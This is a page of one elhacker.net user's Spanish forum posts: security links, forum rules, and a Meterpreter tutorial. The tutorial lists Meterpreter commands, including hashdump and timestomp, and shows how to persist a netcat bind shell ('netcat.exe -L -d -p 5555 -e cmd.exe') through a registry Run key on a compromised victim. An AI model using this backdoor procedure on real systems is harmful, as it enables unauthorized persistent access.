elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Temas
Páginas: 1 [2] 3
11  Seguridad Informática / Nivel Web / Anatomy of xss attack en: 7 Enero 2010, 00:10 am
enlace:
http://security-sh3ll.blogspot.com/2010/01/anatomy-of-xss-attack-featured-at.html
12  Programación / Bases de Datos / Concatenar 2 sentencias en Oracle en: 16 Diciembre 2009, 21:35 pm
Pues eso, hay alguna forma de concatenar 2 sentencias en Oracle que no sea con punto y coma (me da error, invalid character).

He buscado bastante y todo indica que no, pero bueno, si alguien conoce algún truco o algo!

salu2
13  Seguridad Informática / Nivel Web / Web Shells en: 8 Diciembre 2009, 13:54 pm
Interesante PDF

http://security-sh3ll.blogspot.com/2009/12/web-shells.html
14  Seguridad Informática / Hacking / Recopilatorio de Temas del foro de Hacking Básico del mes de Noviembre en: 8 Diciembre 2009, 13:09 pm
Recopilatorio de Temas del foro de Hacking Básico del mes de Noviembre

Temas Interesantes:

"truquillos" que facilitan un poco la vida en una shell remota
https://foro.elhacker.net/hacking_basico/truquillos_que_facilitan_un_poco_la_vida_en_una_shell_remota-t272659.0.html

[How To] Usando Netcat para conectarnos a diferentes protocolos
https://foro.elhacker.net/hacking_basico/how_to_usando_netcat_para_conectarnos_a_diferentes_protocolos-t276043.0.html

[Mini How-To] Usando Meterpreter
https://foro.elhacker.net/hacking_basico/mini_howto_usando_meterpreter-t275163.0.html

Varias distribuciones de seguridad en un solo pendrive
https://foro.elhacker.net/hacking_basico/varias_distribuciones_de_seguridad_en_un_solo_pendrive-t272920.0.html

Dudas más comunes:

- Netcat

https://foro.elhacker.net/hacking_basico/posible_hacer_esto_con_netcat-t275747.0.html
https://foro.elhacker.net/hacking_basico/preguntas_netcat-t275614.0.html
https://foro.elhacker.net/hacking_basico/problemas_para_acceder_a_shell_remota_con_netcat-t275027.0.html
https://foro.elhacker.net/hacking_basico/alguien_me_podria_ayudar_con_netcat-t273383.0.html
https://foro.elhacker.net/hacking_basico/duda_con_netcat-t274692.0.html
https://foro.elhacker.net/hacking_basico/netcat_multiples_shells-t272980.0.html
https://foro.elhacker.net/hacking_basico/ayuda_con_netcat_para_variar-t272657.0.html

- Arp Poisoning, Dns Poisoning, Ettercap, Dsniff, etc...

https://foro.elhacker.net/hacking_basico/acerca_del_uso_de_un_sniffer-t274771.0.html
https://foro.elhacker.net/hacking_basico/problema_con_ettercap_y_ipforwarding-t274099.0.html
https://foro.elhacker.net/hacking_basico/con_que_cosas_se_puede_y_con_cuales_no_usar_man_in_the_middle-t273386.0.html
https://foro.elhacker.net/hacking_basico/iquestenvenenamiento_de_dns-t273260.0.html
https://foro.elhacker.net/hacking_basico/plugin_remotebrowser_en_ettercap-t272750.0.html

- Ataques desde el exterior (mapear puertos, conseguir acceso router, escalar privilegios, etc...)

https://foro.elhacker.net/hacking_basico/iquestcomo_acceder_a_una_pc_que_se_encuentra_en_otra_ciudad_lejana_mediante_internet-t276981.0.html
https://foro.elhacker.net/hacking_basico/mapear_puertos_para_exploits-t276825.0.html
https://foro.elhacker.net/hacking_basico/acceso_remoto_habilitarlo_por_cmd-t275703.0.html
https://foro.elhacker.net/hacking_basico/toma_de_control_de_1_pc_protegido-t276385.0.html
https://foro.elhacker.net/hacking_basico/problema_acceso_a_lan_atacada-t276579.0.html
https://foro.elhacker.net/hacking_basico/problemas_para_acceder_a_shell_remota_con_netcat-t275027.0.html
15  Seguridad Informática / Nivel Web / ENHORABUENA SIMPLEAUDIT en: 2 Diciembre 2009, 11:16 am
bueno, solo quería dar la enhorabuena a todos los integrantes de SimpleAudit, ya que el trabajo que habeis hecho ya se está haciendo notorio ahí fuera:

http://www.securitybydefault.com/2009/12/la-posible-migracion-smf-de-elhackernet.html
16  Seguridad Informática / Hacking / [How To] Usando Netcat para conectarnos a diferentes protocolos en: 27 Noviembre 2009, 21:04 pm
Bueno, surgen muchas dudas y preguntas sobre netcat y algunos de sus usos, muchas de estas dudas, por no decir todas, ya han sido respondidas varias veces.

Partiendo de esto, una de las dudas más comunes y que por ejemplo se ha discutido en un post reciente, es como usar netcat para conectarnos a un Servidor Web mediante el protocolo HTTP, pero como este caso, pueden surgir varios: conectarnos a http sobre ssl, ftp, irc, etc...

Os dejo un buen tuto donde se explica todo esto con ejemplos y que la verdad que está muy bien, eso si, en perfecto inglés!

http://www.foureleven.org/art/art_netcat.html

Un Must-Read como una casa!
17  Seguridad Informática / Hacking / [Mini How-To] Usando Meterpreter en: 20 Noviembre 2009, 02:08 am
Bueno, en este mini-manual, simplemente quería ilustrar el potencial de este magnífico plug-in que nos ofrece la suite MetaSploit Framework.

El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo mil y una funciones al alcance de un sólo comando, con lo que nos permite realizar los ataques haciendo algo menos de ruido.

Antes de ir a lo práctico, os quiero mostrar todas las posibilidades que nos ofrece esta genial herramienta:

Citar
Core Commands
=============

Command       Description
——-       ———–
?             Help menu
channel       Displays information about active channels
close         Closes a channel
exit          Terminate the meterpreter session
help          Help menu
interact      Interacts with a channel
irb           Drop into irb scripting mode
migrate       Migrate the server to another process
quit          Terminate the meterpreter session
read          Reads data from a channel
run           Executes a meterpreter script
use           Load a one or more meterpreter extensions
write         Writes data to a channel

Stdapi: File system Commands
============================

Command       Description
——-       ———–
cat           Read the contents of a file to the screen
cd            Change directory
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
pwd           Print working directory
rmdir         Remove directory
upload        Upload a file or directory

Stdapi: Networking Commands
===========================

Command       Description
——-       ———–
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing table

Stdapi: System Commands
=======================

Command       Description
——-       ———–
execute       Execute a command
getpid        Get the current process identifier
getuid        Get the user that the server is running as
kill          Terminate a process
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shutdown      Shuts down the remote computer
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command       Description
——-       ———–
idletime      Returns the number of seconds the remote user has been idle
uictl         Control some of the user interface components

Priv: Password database Commands
================================

Command       Description
——-       ———–
hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command       Description
——-       ———–
timestomp     Manipulate file MACE attributes

Bueno, como ejemplo básico del uso de meterpreter, vamos a suponer que hemos encontrado una vulnerabilidad en un sistema Windows, y que con ayuda del Metasploit le cascamos el exploit y le indicamos que como payload nos devuelva una sesión con el meterpreter a través de una conexión directa a la víctima.

Una vez que estamos situados en este escenario, nuestra tarea va a ser crear un backdoor un tanto rudimentario (pero efectivo), vamos a subirle un netcat a la víctima, y creando adecuadamente una entrada en el registro, vamos a hacer que cada vez que se arranque el sistema se ejecute netcat y espere conexiones en el puerto 5555, de forma que en el momento en el que nos conectemos, nos devuelva un cmd.

Bueno, pues manos a la obra!

Una vez que tenemos nuestro flamante metasploit corriendo...



Y como hemos indicado, se ha conseguido explotar alguna vulnerabilidad en el sistema remoto y obtener una sesión de meterpreter, procedemos a subir el ejecutable del netcat a la víctima, más concretamente a la carpeta System32:


Una vez que está subido, el siguiente paso será insertar una clave en el registro para que el programa se ejecute automáticamente al iniciar el sistema, y comprobamos que la clave se haya añadido :



la imagen es un poco grande y no se ve todo el comando de netcat, que sería:
Código:
netcat.exe -L -d -p 5555 -e cmd.exe


Finalmente, esperamos a que el Sistema de la víctima se reinicie para comprobar si ha funcionado el backdoor...



Voilà!! Parece que todo ha funcionado, y el Sistema al reiniciarse ejecuta sin problemas el netcat.
Para comprobarlo, otra captura más del registro del Pc Víctima visto desde dentro, donde comprobamos que efectivamente todo se ha añadido correctamente:




Como veis, esto es simplemente la punta del iceberg, es un ejemplo muy básico, pero creo que a la vez muy descriptivo de lo que se puede llegar a hacer y la facilidad con la cual hacerlo...

Os insto a que le echeis un ojo a este magnífico plug-in, y a su gran lista de funcionalidades, sin duda es una herramienta que nos hará la vida un poco más fácil!

saludos
18  Seguridad Informática / Nivel Web / IBWAS09, the Iberic Web Application Security conference en: 16 Noviembre 2009, 16:05 pm
Bueno, lo he puesto en eventos en hacking, pero seguramente aquí también esté bien, así que dejo el link

https://foro.elhacker.net/hacking_avanzado/ultimos_eventos_sobre_seguridadinseguridad-t149468.0.html;msg1348225#msg1348225
19  Seguridad Informática / Nivel Web / Una herramienta de seguridad web que copia los movimientos de las aplicaciones en: 11 Noviembre 2009, 17:25 pm
Os dejo el enlace:

http://blog.segu-info.com.ar/2009/11/una-herramienta-de-seguridad-web-que.html
20  Seguridad Informática / Hacking / POR UN FORO MEJOR Y NORMAS en: 29 Octubre 2009, 02:30 am
Los Moderadores del SubForo de Hacking Básico hemos decidido re/organizar este subforo, con el fin de ACTUALIZAR contenidos, CREAR nuevos contenidos y obviamente porque creemos que con estos ligeros cambios conseguiremos MEJORAR este subforo.

Nos vamos a basar en el documento que en su día posteó Gospel, ya que la mayoría de los puntos siguen vigentes, modificando o añadiendo cosas puntuales donde se crea necesario:

¿Qué pasa con el Foro de Hacking Básico?
 
El Foro de Hacking Básico se convierte en el Foro de Hacking por excelencia.
En este foro se postearán las dudas relacionadas con temas de Hacking e In/Seguridad Informática, pero su contenido deberá ajustarse a la normativa del foro.

El Foro de Hacking lleva muchos años activo en elhacker.net y por aquí han pasado infinidad de usuarios planteando sus dudas y obteniendo respuesta a las mismas. Es bastante posible que los nuevos usuarios tengan dudas cuyo contenido ya ha sido expuesto en otros temas anteriores. Por esta razón, recomendamos acudir al hilo de FREQUENTLY ASKED QUESTIONS y utilizar el botón antes de postear un nuevo tema en el Foro.

Recordamos que los Moderadores se reservan el derecho a eliminar cualquier tema posteado cuya duda ya haya sido resuelta.


¿Qué pasa con el Foro de Hacking Avanzado?

El Foro de Hacking Avanzado se convierte en el Foro de Papers relacionados con el Hacking y la In/Seguridad Informática.
En este Foro estarán disponibles:
    - Manuales y Tutoriales
    - Cursos y Talleres
    - Documentos de interés para la Seguridad Informática.

Con esta iniciativa, elhacker.net pretende disponer de un repositorio de papers que permitan ofrecer ayuda al usuario. Asimismo, quiere motivar la participación activa de los usuarios, animándolos a plasmar en un documento sus conocimientos sobre temas de Hacking.

Para fomentar este último punto, se intentarán crear la mayor cantidad de actividades posibles en las que los usuarios se sientan partícipes y puedan interactuar activamente entre nosotros/ellos, pero volveremos a esto más tarde.

¿Por qué este cambio de política?

El objetivo principal de los Moderadores es mejorar la calidad de convivencia del Foro.
Por un lado, el Foro debe permitir a los nuevos usuarios obtener respuestas a sus preguntas. Estas respuestas pueden ser obtenidas navegando a través del hilo de FREQUENTLY ASKED QUESTIONS y utilizando el botón . Resulta incómodo ver publicadas en el foro consultas de usuarios que ya han sido respondidas con anterioridad y no suponen utilidad para el resto de la comunidad.
Por otro lado, el Foro debe permitir a cualquiera plantear una duda que no haya sido resuelta y obtener respuesta mediante la participación del resto de usuarios, siendo ésta la actividad que en verdad enriquece la calidad del Foro.

Con el fin de mejorar el funcionamiento de esta comunidad, los Moderadores de los foros de Hacking actuarán en consecuencia a la normativa vigente y vigilarán por el buen uso del Foro.

Recordad! antes de publicar un post, pensad si vuestra acción va a beneficiar a otros usuarios o, por el contrario, sólo va a servir para obtener una respuesta rápida a vuestras necesidades egoístas. El Foro lo hacemos entre todos!


¿Cual va a ser la nueva dinámica?

Vamos a intentar mantener 3 chinchetas principales, en las que se agrupará en su interior el contenido correspondiente a estas temáticas

- Chincheta sobre Reglas y todo lo relacionado con este tema

- Chincheta sobre documentos autocontenidos, es decir, posts donde todo lo necesario para su entendimiento está explicado en ellos mismos

- Chincheta con enlaces a otros posts/enlaces externos

En principio se va a trabajar con estas 3 chinchetas, pero obviamente se irán generando posts que se consideren de especial interés y que merezcan una chincheta, pero aquí estará el cambio, estas chinchetas permanecerán un máximo de 2 meses, pasando después a alguno de los 3 grupos citados anteriormente.
Puede haber excepciones cuando una chincheta se actualice con cierta periodicidad.


Talleres, HowTo's, etc...

Como se ha expuesto antes, uno de nuestros objetivos fundamentales es fomentar en la medida de lo posible, la participación de los usuarios que visiten el subforo, por lo que se van a ir creando/actualizando poco a poco actividades que así lo permitan, como pueden ser talleres, HowTo's eminentemente prácticos, retos, etc...



Normas del Subforo

1) En este Foro, sólo está permitido hablar sobre temas de Hacking e In/Seguridad Informática.

   1.1) Serán movidos/eliminados del Foro aquellos temas relacionados con otras secciones de foro.elhacker.net, tales como Exploits, Defensa de Sistemas, Virus y Troyanos, etc.

   1.2) Serán eliminados del Foro aquellos temas que no cumplan con unos requisitos mínimamente científicos y educacionales, tales como:
- Hackeo de cuentas de correo ajenas.
- Envío masivo de virus o spam.
- Fastidiar a otras personas.
- etc.


2) Serán bloqueados/eliminados del Foro aquellos temas que no se ajusten al formato de posteado adecuado.

   2.1) Serán bloqueados/eliminados del Foro aquellos temas que ya hayan sido contestados y repetidos. Antes de postear, buscad si vuestra duda ya ha sido resuelta con anterioridad utilizando el botón .

   2.2) Serán bloqueados/eliminados del Foro aquellos temas cuya duda sea fácilmente resuelta preguntando correctamente en Google o

   2.3) Serán bloqueados/eliminados del Foro aquellos temas cuyo título no describa el contenido del mensaje. Estoy hablando de todos aquellos temas que se titulan: "Ayuda", "Help", "Urgente", "Alguien sabe si...", etc.

   2.4) Serán bloqueados/eliminados del Foro aquellos posts cuya presentación no sea mínimamente legible. Estoy hablando de todos aquellos usuarios que escriben en mayúsculas (aquí nadie grita!), que escriben con colorines, que escriben en $up3rJ3r64 H4x0r (aquí nadie es más wuay que otros!), etc.

      2.4.2) Serán bloqueados/eliminados del Foro aquellos posts cuya presentación atente contra
      el diccionario de la Real Academia de la Lengua Española.

     Si no sabes escribir, no sé que haces utilizando un PC. Nadie es perfecto y se admiten
     cosas como confundir una B con una V por esta cerca en el teclado.
     Pero alguien me explica que es eso de funka? ??? wey? ???

     Escribir bien no cuesta nada.

3) Los moderadores se reservan el derecho a bloquear/mover/eliminar cualquier tema que ellos consideren conveniente y, además, se reservan el derecho a dejar un mensaje de movido/eliminado.
Si no encuentras tu post, busca por el foro por si ha sido movido. Si aún así no lo encuentras, es posible que haya sido eliminado por no ajustarse a las normas del Foro. En cualquier caso, puedes contactar con los Moderadores si tienes dudas.



Los Moderadores se reservan el derecho a modificar esta Normativa según acontecimientos del Foro.

Esta normativa se ajusta a la normativa general del Foro de elhacker.net.
- REGLAS DEL FORO elhacker.net -
http://foro.elhacker.net/index.php/topic,17721.0.html



Esperamos que este nuevo giro de tuerca sea del agrado de los usuarios, y que entre todos consigamos un foro mejor, gracias.

Los Moderadores.


Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines